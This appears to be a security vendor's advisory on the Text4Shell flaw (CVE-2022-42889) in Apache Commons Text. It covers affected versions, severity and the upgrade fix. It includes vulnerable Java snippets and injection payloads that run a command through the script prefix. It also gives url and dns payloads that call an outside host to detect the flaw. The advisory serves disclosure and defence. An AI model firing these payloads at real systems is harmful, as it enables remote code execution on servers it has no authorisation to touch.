CVE-2022-42889: Text4Shell, Critical Vulnerability in Apache Commons Text
Table of Contents
As happened in December last year with Log4Shell, the vulnerability that affected a multitude of Java products that made use of the Log4J library, a new alert has arisen for the vulnerability that is now known as Text4Shell. This vulnerability (CVE-2022-42889) also affects Java products that make use of a specific functionality of the Apache Commons Text library, and could allow a remote attacker to execute arbitrary code on a server.
Apache Commons Text library is an alternative library to the native Java JDK functionalities for processing text strings focused on specific algorithms for managing this type of data. Its available methods allow the use of interpolation through prefixes, variables and template marks.
Despite the high CVSS score assigned to this vulnerability, it should be noted that the use of the vulnerable component of the Apache Commons Text library is unusual in the processing of untrusted user-controlled inputs. This situation means that the probability of exploitation is quite low compared to Log4Shell.
This issue was identified and reported to the Apache security team on 03/09/2022 by Álvaro Muñoz and was fixed in version 1.10 .0 published on 09/24/2022 without any advisory content related to the correction of CVE-2022-42889 or changes related to this security issue.
It was not until October 13 was announced on the Apache developer list.
The commit that solves this issue is referenced below:
https://github.com/apache/commons-text/commit/b9b40b903e2d1f9935039803c9852439576780ea
This vulnerability is similar to CVE-2022-33980, which also allowed the interpolation of some strings but in the Apache Commons Configuration library:
https://lists.apache.org/thread/tdf5n7j80lfxdhs2764vn0xmpfodm87s
CVE-2022-42889: Key Features
The main characteristics of this vulnerability are detailed below:
- Bug identifier: CVE-2022-42889
- Published date: 13/10/2022
- Affected software: Apache Commons Text
- CVSS Score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)
- Affected versions:
- 1.5 – 1.9
- Exploitation requirements:
- The application accepts user-controlled input that is subsequently processed by one of the following methods of the affected component:
- StringLookupFactory.INSTANCE.interpolatorStringLookup().lookup()
- StringSubstitutor.createInterpolator().replace()
- Java versions equal or greater than Java 15 would not be susceptible to remote code execution, since the Nashorn engine is disabled and the “script” prefix would not be available. However, other attacks via the “url” and “dns” prefixes would be possible.
- The application accepts user-controlled input that is subsequently processed by one of the following methods of the affected component:
Text4Shell mitigation
The primary solution is to urgently update the Apache Commons Text component to the latest available version that fixes this vulnerability. Specifically, you must upgrade to Apache Commons Text version 1.10.0 or later.
In 1.10.0 update problematic substitutions have been disabled by default. The following details is included in the library’s changelog file:
Make default string lookups configurable via system property. Remove dns, url, and script lookups from defaults. If these lookups are required for use in StringSubstitutor.createInterpolator(), they must be enabled via system property. See StringLookupFactory for details.
From Apache Commons dev list a statement has been published with the official information and a reference to the updated version in which the problem is solved.
Examples of code vulnerable to CVE-2022-42889
Below are two source code examples that demonstrate the possibility of executing arbitrary code using an affected version of the Apache Commons Text component.
Example 1
String poc1 = “${script:javascript:java.lang.Runtime.getRuntime().exec(\”touch /tmp/tarlogic\”);}”;
String rce1 = StringSubstitutor.createInterpolator().replace(poc1);
Example 2
String poc2 = “script:javascript:java.lang.Runtime.getRuntime().exec(\”touch /tmp/tarlogic\”)”;
String rce2 = StringLookupFactory.INSTANCE.interpolatorStringLookup().lookup(poc2);
Detection of Text4Shell CVE-2022-42889 vulnerability – Exploit
On one hand, as can be extracted from the previous vulnerable code examples, remote code execution could be exploited with payloads like the ones shown below, which make use of the script prefix:
• ${script:javascript:java.lang.Runtime.getRuntime().exec(“touch /tmp/tarlogic”);}
• script:javascript:java.lang.Runtime.getRuntime().exec(“touch /tmp/tarlogic”)
On the other hand, the remote detection of the vulnerability could also be carried out using url and dns prefixes, verifying that an external server receives an interaction from affected server that hosts the application. Since the dns prefix was introduced in version 1.8 of Apache Commons Text, detection using the url prefix (present in version 1.5) offers better results.
• ${url:UTF-8:https://server.com}
• ${dns:address|server.com}
As part of Tarlogic‘s Emerging Vulnerabilities service, we proactively monitor customers perimeter to urgently report, detect and notify the presence of this vulnerability, as well as other new critical threats that could have a serious impact on the security of your assets.
CVE-2022-42889 vulnerability references in Apache Text Commons
• https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/
• https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/
• https://commons.apache.org/proper/commons-text/userguide.html
• https://nvd.nist.gov/vuln/detail/CVE-2022-42889
• https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om